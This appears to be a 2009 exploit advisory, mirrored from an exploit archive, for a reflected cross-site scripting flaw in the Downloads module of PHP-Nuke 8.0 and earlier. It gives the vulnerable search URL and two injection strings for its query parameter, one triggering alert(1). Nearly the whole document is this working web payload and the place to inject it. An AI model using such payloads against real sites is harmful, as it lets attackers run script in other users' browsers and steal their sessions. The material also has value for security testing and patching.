id: 10000
date: 11/21/2009
title: PHP-Nuke <= 8.0 Downloads Module XSS
author: Rohit Bansal
cves: 

====================================
PHP-Nuke <= 8.0 Downloads Module XSS
====================================

# Exploit Title: XSS Downloads Module PHP-Nuke <= 8.0
# Date: 19 Nov 2009
# Author: Rohit Bansal
# Version: PHP-Nuke <= 8.0
# Tested on: independent platform
# Code :
 
--------------------------------------------------------------
|XSS Downloads Module PHP-Nuke <= 8.0
|Grab Status: 100%. |
--------------------------------------------------------------
 
[+] VULN:
 
http://server/modules.php?name=Downloads&d_op=search&query=[XSS]
 
WHERE IS:
 
[XSS] = '';!--"
 
OR
 
'';!--"=&{(alert(1))}
----------------------------------------------------------------------------------------------



#  0day.today [2023-03-23]  #